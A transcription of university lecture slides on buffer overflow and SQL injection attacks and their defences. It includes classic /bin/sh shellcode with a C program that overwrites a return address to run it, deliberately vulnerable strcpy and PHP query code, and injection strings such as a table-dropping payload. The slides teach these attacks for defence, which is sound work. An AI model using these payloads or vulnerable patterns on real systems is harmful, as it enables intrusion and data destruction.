We will focus on Buffer overflow attacks SQL injections. See book for other examples

Similar documents
Program Security and Vulnerabilities Class 2

Software Security II: Memory Errors - Attacks & Defenses

CMSC 414 Computer and Network Security

CSE 565 Computer Security Fall 2018

Security and Privacy in Computer Systems. Lecture 5: Application Program Security

Fundamentals of Computer Security

Buffer Overflows. A brief Introduction to the detection and prevention of buffer overflows for intermediate programmers.

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows

Buffer overflow background

CSCE 548 Building Secure Software Buffer Overflow. Professor Lisa Luo Spring 2018

Buffer Overflows Defending against arbitrary code insertion and execution

CSc 466/566. Computer Security. 20 : Operating Systems Application Security

Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall Nitesh Saxena

Beyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)

CIS 551 / TCOM 401 Computer and Network Security. Spring 2007 Lecture 2

CMPSC 497 Buffer Overflow Vulnerabilities

Lecture 6: Buffer Overflow. CS 436/636/736 Spring Nitesh Saxena

Topics in Software Security Vulnerability

CS 645: Lecture 3 Software Vulnerabilities. Rachel Greenstadt July 3, 2013

Secure Systems Engineering

2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks

Buffer Overflow & Format Strings

Buffer Overflow Attacks

CSE 127: Computer Security. Memory Integrity. Kirill Levchenko

Lab 2: Buffer Overflows

Software Security: Buffer Overflow Defenses

CS 161 Computer Security

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University

Secure Programming I. Steven M. Bellovin September 28,

Buffer Overflow. Jinkyu Jeong Computer Systems Laboratory Sungkyunkwan University

Basic Buffer Overflows

Lecture 4 September Required reading materials for this class

Software Security: Buffer Overflow Attacks

Foundations of Network and Computer Security

Defense against Code-injection, and Code-reuse Attack

Lecture 08 Control-flow Hijacking Defenses

Buffer Overflow Vulnerability

Secure Programming Lecture 3: Memory Corruption I (Stack Overflows)

COMP3441 Lecture 7: Software Vulnerabilities

Buffer overflow prevention, and other attacks

Smashing the Buffer. Miroslav Štampar

Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz I

CSE 565 Computer Security Fall 2018

Buffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts

Architecture-level Security Vulnerabilities

BUFFER OVERFLOW. Jo, Heeseung

Buffer Overflow. Jo, Heeseung

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University

Introduction to Operating Systems Prof. Chester Rebeiro Department of Computer Science and Engineering Indian Institute of Technology, Madras

Software Security: Buffer Overflow Attacks (continued)

ECE 471 Embedded Systems Lecture 22

1/31/2007 C. Edward Chow. CS591 Page 1

Buffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.

Buffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through to

CS 161 Computer Security

Architecture-level Security Vulnerabilities. Julian Stecklina

Buffer overflows (a security interlude) Address space layout the stack discipline + C's lack of bounds-checking HUGE PROBLEM

Secure Software Development: Theory and Practice

CSE 127 Computer Security

Roadmap: Security in the software lifecycle. Memory corruption vulnerabilities

20: Exploits and Containment

Lecture Embedded System Security A. R. Darmstadt, Runtime Attacks

CSE 127 Computer Security

Lecture 9 Assertions and Error Handling CS240

Secure Programming. Buffer Overflows Learning objectives. Type. 3 Buffer Overflows. 4 An Important Vulnerability. 5 Example Overflow

Control Hijacking Attacks

Software Vulnerabilities August 31, 2011 / CS261 Computer Security

Pointers, Arrays, and Strings. CS449 Spring 2016

Università Ca Foscari Venezia

Runtime Defenses against Memory Corruption

Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz I

Module: Program Vulnerabilities. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security

Advanced Buffer Overflow

Control Flow Hijacking Attacks. Prof. Dr. Michael Backes

Buffer Overflow Attack

Memory Corruption Vulnerabilities, Part I

Fundamentals of Linux Platform Security

CNIT 127: Exploit Development. Ch 2: Stack Overflows in Linux

Stack Vulnerabilities. CS4379/5375 System Security Assurance Dr. Jaime C. Acosta

Is stack overflow still a problem?

CNIT 127: Exploit Development. Ch 1: Before you begin. Updated

Other array problems. Integer overflow. Outline. Integer overflow example. Signed and unsigned

Code with red border means vulnerable code. Code with green border means corrected code. This program asks the user for a password with the function

CSCD 303 Fall Lecture 15 Buffer Overflows

ISA 564, Laboratory I: Buffer Overflows

Module: Program Vulnerabilities. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security

Buffer Overflow and Protection Technology. Department of Computer Science,

Outline. Classic races: files in /tmp. Race conditions. TOCTTOU example. TOCTTOU gaps. Vulnerabilities in OS interaction

ECS 153 Discussion Section. April 6, 2015

Stack-Based Buffer Overflow Explained. Marc Koser. East Carolina University. ICTN 4040: Enterprise Information Security

malloc() is often used to allocate chunk of memory dynamically from the heap region. Each chunk contains a header and free space (the buffer in which

Security Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40

Module: Program Vulnerabilities. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security

SECURE CODING PART 1 MAGDA LILIA CHELLY ENTREPRENEUR CISO ADVISOR CYBERFEMINIST PEERLYST BRAND AMBASSADOR TOP 50 CYBER CYBER

Some recent security news

Exploits and gdb. Tutorial 5

Secure Programming Techniques

CSE 127 Computer Security

Sungkyunkwan University

Writing Exploits. Nethemba s.r.o.

Transcription:

We will focus on Buffer overflow attacks SQL injections See book for other examples Buffer overrun is another common term Buffer Overflow A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system. NIST Glossary of Key Information Security Terms Result of programming error EITA25 - Computer Security 1 EITA25 - Computer Security 2 Morris worm 1988, used buffer overflow in fingerd. 6000 computers infected within a few hours (10% of internet) Code Red 2001 used buffer overflow in Microsoft IIS Blaster worm 2003 Slammer worm 2003 Sasser worm 2004 Consequences Crash program Change program flow Arbitrary code is executed Possible payloads Denial of Service Remote shell Virus/worm Rootkit CWE-119: Failure to Constrain Operations within the Bounds of a Memory Buffer More than 10133 known vulnerabilities with this weakness (since 1999) 2630 since Jan 2017 Also includes e.g., Heartbleed EITA25 - Computer Security 3 EITA25 - Computer Security 4 1

Find a buffer to overflow in a program Write the exploit Inject code into the buffer Redirect the control flow to the code in the buffer Target either stack or heap Note: Many things that will be mentioned are specific for compilers, processors and/or operating systems. A typical behaviour will be described. We will follow the description in Aleph One - Smashing the Stack for Fun and Profit (From 1996, but still very much worth a read) A process has its own virtual address space Stack last in first out, LIFO queue Heap used for dynamic memory allocation Global data Global variables, static variables Top of memory Main memory Kernel code and data Stack Extra Memory Heap Global Data Program machine code EITA25 - Computer Security 5 EITA25 - Computer Security 6 Stack grows down (Intel, Motorola, SPARC, MIPS) Function parameters input to function Return address where to return when procedure is done Saved frame pointer where the frame pointer was pointing in the previous stack frame Local variables Top of memory Function parameters Return address Saved frame pointer Local variables Example program void function(int a, int b, int c) { char buffer1[8]; char buffer2[12]; int main() { function(1,2,3); 3,2, and 1 are pushed onto the stack Function is called Old frame pointer is stored here and new frame pointer is set to value of stack pointer 8 bytes for buffer1 and 12 bytes for buffer2 are allocated. Top of memory Function parameters Return address Saved frame pointer Local variables 12 8 4 4 4 4 4 Top of memory EITA25 - Computer Security 7 buffer2 buffer1 sfp ret a b c EITA25 - Computer Security 8 2

void function(char *str) { char buffer[16]; strcpy(buffer, str); int main(){ char large_string[256]; int i; for (i = 0; i < 255; i++) { large_string[i] = A ; function(large_string); Copy a large buffer into a smaller buffer. If length is not checked, data will be overwritten strcpy() does not check that size of destination buffer is at least as long as source buffer. After strcpy(), the function tries to execute instruction at 0x41414141 Program will result in segmentation fault return address is not likely in process s space void function(int a, int b, int c) { char buffer1[8]; char buffer2[12]; int *r; r = buffer1 + 12; (*r) += 8; int main() { int x = 0; function(1,2,3); x = 1; printf( %d\n, x); buffer1 allocates 8 bytes. Saved frame pointer allocates 4 bytes so r is pointing to the return address Then r is incremented by 8 bytes. This will cause the return address to be 8 bytes after what it was supposed to be. The instruction x=1 will be skipped. 16 4 4 4 AAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAA buffer sfp ret *str EITA25 - Computer Security 9 Bottom of stack r 12 8 4 4 4 4 4 Top of stack +8 buffer2 buffer1 sfp ret a b c EITA25 - Computer Security 10 We managed to overflow the buffer and overwrite the return address and crash the program We managed to change the return address so that instructions in the calling functions were ignored (skipped) Not much damage yet, it is just a program that doesn t work. Now, we want to combine this and additionally run our own code. Basic idea: Put code in the buffer and change the return address to point to this code! #include <stdio.h> void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); char shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46 \x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e \x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8 \x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; Compile the code into assembly language Find the interesting part and save this Problem: We can not have NULL in the resulting code. Solution: Replace by xor with same register to get NULL, then use this register when NULL is needed. Replace code with its hex representation EITA25 - Computer Security 11 EITA25 - Computer Security 12 3

char shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *)large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); Adress R Large_string is filled with the start address of buffer. Then shellcode is put into large_string Then large_string is copied into buffer and return address is overwritten with start address of buffer S: Shellcode R: Return address (4 byte) 96 4 4 SSSSSSSSSSSRR...R R R buffer R sfp ret EITA25 - Computer Security 13 What if we want to do the same thing to another program (not our own)? We do not know the address of the start of the buffer! We have to guess it but if the guess is wrong the attack will not work. We can get some help when guessing Stack will always start at the same address Run another program and find out roughly where the buffer might be Use NOP instructions so that the guess only has to be approximate if we return to anywhere inside the run of NOPs, it will still work 96 4 4 NNNNNSSSSSR...R R R EITA25 - Computer Security 14 gets(char *str) Read a string and save in buffer pointed to by str sprintf(char *str, char *format,...) Create a string according to supplied format and variables strcat(char *dest, char *src) append contents of string src to string dest strcpy(char *dest, char *src) Copy string in src to dest A canary word is inserted before the local variables Before returning from process, the canary is checked so that it has not changed If changed terminate Can be both static or random If value is known to attacker it can just be overwritten with the same value Implemented in GCC and can be used by including option fstack protector Some distributions have it enabled by default (OpenBSD, Ubuntu) and some do not (NetBSD, Debian, Gentoo) Visual C++ has /GS flag to prevent buffer overflow. Windows Server 2003 was compiled with this switch and was immune to the Blaster worm. Very efficient if value can be kept hidden Top of memory Function parameters Return address Saved frame pointer Canary value Local variables EITA25 - Computer Security 15 EITA25 - Computer Security 16 4

The canary solution can detect the attack. It is better if it can be prevented Do not use the unsafe functions, replace e.g., strcpy() by strncpy() and strcat() by strncat(). Check source automatically using software Use Java instead of C or C++ (but remember that the Java VM can be a C program) Increased awareness has lowered the number of applications vulnerable to this attack Interest is shifted towards web application attacks Recall that the shellcode was copied into the buffer located on the stack. Stack usually contains integers, strings, floats, etc. Usually there is no reason for the stack to contain executable machine code On modern processors this can be enforced on hardware level using the NX-bit. Called Data Execution Prevention (DEP) in Windows. EITA25 - Computer Security 17 EITA25 - Computer Security 18 Stack is no longer executable due to W X. Let's jump somewhere else then! libc standard C library which contains lots of functions. Typical target system(const char *command); Executes any shell command (e.g. /bin/sh to start a new shell) Randomizes location of Stack Heap Dynamically loaded libraries Exact addresses of buffers will be unknown Exact address of libraries (e.g., libc) will be unknown Stack Heap Stack Heap libraries Stack Heap libraries libraries EITA25 - Computer Security 19 EITA25 - Computer Security 20 5

SQL Structured Query Language Both ANSI standard (1986) and ISO standard (1987) Language designed to retrieve and manipulate data in a Relational Database Management System (DBMS) Example query string Table: users userid name lastname secret position 1 Alice Smith ashfer7f Doctor 2 Bob Taylor btfniser78w Nurse 3 Daniel Thompson dtf39pa Nurse Select ProductName from Products where ProductID = 35 Defines columns to return (wildcard * can be used) Defines which table to return from Defines which rows to return. (All rows where expression evaluates to TRUE) EITA25 - Computer Security 21 selectname, lastname from users where position = nurse Will return name lastname Bob Taylor Daniel Thompson EITA25 - Computer Security 22 Consider the following PHP code: $passw = $_POST[ LoginSecret ]; $query = SELECT * FROM users WHERE secret =. $passw. ; $result = mysql_query($query); 1. Read name from posted data (user input) 2. Create a SQL query string 3. Make the query and save output in result Does not matter if you have Most up-to-date version of OS and web server Firewall perfectly configured Problem is not in webserver, database or network, but in the web application Programming error due to improper (or no) input validation Popular to implement your own application that can access the database Many implementations Many systems vulnerable EITA25 - Computer Security 23 EITA25 - Computer Security 24 6

$query = SELECT * FROM users WHERE secret =. $passw. ; Example of expected input: ashfer7f $query = SELECT * FROM users WHERE secret = ashfer7f ; Example of unexpected input: a' OR 'x'='x $query = SELECT * FROM users WHERE secret = a OR x = x ; Example of unexpected input: ; drop table users;-- $query = SELECT * FROM users WHERE secret = ; drop table users;-- ; Escape quotes using mysql_real_escape_string() becomes \ and becomes \ Use prepared statements separates query and input data (see web security course for details) Check syntax using regular expressions Email, numbers, dates etc Turn off error reporting when not debugging Use table and column names that are hard to guess Always assume that input is malicious EITA25 - Computer Security 25 EITA25 - Computer Security 26 From CWE/SANS Top 25 Most Dangerous Software Errors (http:// cwe.mitre.org/top25/) 1 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') 2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') 3 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') 4 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') 5 Missing Authentication for Critical Function 6 Missing Authorization 7 Use of Hard-coded Credentials 8 Missing Encryption of Sensitive Data 9 Unrestricted Upload of File with Dangerous Type 10 Reliance on Untrusted Inputs in a Security Decision 11 Execution with Unnecessary Privileges 12 Cross-Site Request Forgery (CSRF) 13 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') EITA25 - Computer Security 27 EITA25 - Computer Security 28 7

Handwritten votes, Swedish Election 2010...;Halmstad;15;Hallands län;306;snöstorp 6;Pondus;1...;Halmstad;15;Hallands län;904;söndrum 4;pwn DROP TABLE VALJ;1...;Halmstad;15;Hallands län;1001;holm-vapnö;raggarpartiet;1 http://xkcd.com/327/ EITA25 - Computer Security 29 8

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback